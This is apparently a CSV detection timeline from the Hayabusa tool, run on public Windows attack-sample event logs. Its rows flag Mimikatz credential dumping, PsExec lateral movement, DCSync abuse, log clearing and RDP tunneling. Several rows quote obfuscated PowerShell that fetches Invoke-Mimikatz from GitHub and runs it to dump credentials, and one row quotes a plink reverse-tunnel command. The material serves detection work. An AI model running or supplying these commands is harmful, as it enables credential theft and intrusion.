([Char][iNT]$_)},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:25:04.174 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('IEX ('+'New'+'-Object'+' Net.Web'+'Client'+')'+'.DownloadString(oH'+'4http'+'s:'+'//raw'+'.g'+'it'+'hubuse'+'rcontent.c'+'om/m'+'at'+'tifes'+'t'+'a'+'tion/'+'Po'+'we'+'rSploit/ma'+'s'+'ter/Exfiltra'+'tion'+'/I'+'nvoke-Mimikat'+'z.ps1oH4'+'); Invoke-Mimi'+'katz -Du'+'mpCred'+'s') -REpLacE ([cHaR]111+[cHaR]72+[cHaR]52),[cHaR]39)| IEx",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-30 19:25:20.783 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"(((""{41}{32}{44}{45}{20}{36}{35}{21}{10}{40}{29}{42}{26}{28}{1}{19}{15}{11}{48}{49}{39}{30}{4}{18}{47}{31}{24}{23}{33}{43}{12}{13}{7}{8}{22}{46}{14}{27}{25}{5}{0}{34}{6}{16}{17}{38}{3}{9}{2}{37}"" -f'1','ubuserco','Dump','tz ','festati','atz.ps','); In','s','t','-','p','m/','/','ma','ion/I','co','vok','e-M','on','ntent.','load','t','er','l','p','e-Mimik','.','nvok','gith',':','ti','rS',' (New-','o','{0}','t','String({0}h','Creds','imika','t','s','IEX','//raw','it','Object Net.WebCli','ent).Down','/Exfiltrat','/Powe','m','a')) -F [ChaR]39) | . 
( $ShelliD[1]+$sHELliD[13]+'X')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-30 19:25:48.631 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$l7i= "" ))93]RaHc[ f- )'sderCpmuD-'+' ztak'+'imi'+'M'+'-e'+'kovnI'+' '+';)}0{'+'1sp.'+'ztaki'+'mi'+'M-ekovnI/no'+'i'+'ta'+'rtl'+'ifx'+'E/'+'retsa'+'m/'+'tiolpSrewoP'+'/no'+'itats'+'e'+'fitt'+'am'+'/moc'+'.tne'+'tn'+'o'+'cresu'+'buhtig'+'.war//:sptth}0{(gn'+'ir'+'tSdaol'+'n'+'woD.)'+'tne'+'ilCb'+'eW.t'+'eN t'+'c'+'ejbO-w'+'eN('+' X'+'EI'(( ( )'x'+]03[emoHSP$+]12[EmOHsp$ ( & ""; ( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE[-1 ..-(( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE.lengTh)]-JOIN''|& ( ([StRiNg]$VERbOsePREferENCe)[1,3]+'X'-join'')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-30 19:25:48.647 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,& ( $psHOmE[21]+$PSHome[30]+'x') ( (('IE'+'X '+'(Ne'+'w-Obje'+'c'+'t Ne'+'t.We'+'bCli'+'ent'+').Dow'+'n'+'loadSt'+'ri'+'ng({0}https://raw.'+'github'+'userc'+'o'+'nt'+'ent.'+'com/'+'ma'+'ttif'+'e'+'stati'+'on/'+'PowerSploit'+'/m'+'aster'+'/E'+'xfi'+'ltr'+'at'+'i'+'on/Invoke-M'+'im'+'ikatz'+'.ps1'+'{0});'+' '+'Invok'+'e-'+'M'+'imi'+'katz '+'-DumpCreds') -f [cHaR]39)),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2017-08-30 19:25:48.647 +00:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2019-01-19 13:00:10.350 +00:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | 
Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.350 +00:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.540 +00:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named 
Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 13:00:10.711 +00:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-20 07:00:50.800 +00:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx +2019-01-20 07:29:57.863 +00:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx +2019-02-02 09:16:52.479 +00:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:22.562 +00:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:22.563 +00:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:22.563 +00:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:27.629 +00:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 09:17:27.629 +00:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-13 15:15:04.175 +00:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:15:08.689 +00:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:19:51.259 +00:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:26:53.356 +00:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:26:53.356 +00:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:29:40.657 +00:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:31:19.529 +00:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 15:31:31.556 +00:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-13 18:01:41.593 +00:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:02:04.426 +00:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:02:04.426 +00:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:02:04.526 +00:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:02:04.526 +00:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:03:28.318 +00:00,PC01.example.corp,4688,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation_builtin/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:03:28.318 +00:00,PC01.example.corp,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:01.632 +00:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel 
WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:01.632 +00:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:43.171 +00:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:45.905 +00:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:45.905 +00:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:57.442 +00:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:57.462 +00:00,PC01.example.corp,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:57.542 +00:00,PC01.example.corp,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 
18:04:58.363 +00:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:58.363 +00:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:58.363 +00:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:58.363 +00:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:04:58.363 +00:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:05:00.997 +00:00,PC01.example.corp,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:05:04.802 +00:00,PC01.example.corp,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command 
and Control/DE_RDP_Tunnel_5156.evtx +2019-02-13 18:05:04.873 +00:00,PC01.example.corp,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 10:01:46.884 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:01:50.699 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:21.934 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:21.934 +00:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:21.934 +00:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote 
Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:21.934 +00:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:22.965 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:48.502 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:48.502 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:02:48.502 +00:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/net_connection_win_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:02.272 
+00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:02.272 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:47.086 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:48.058 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:03:48.078 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.141 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.151 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.221 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.221 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.231 
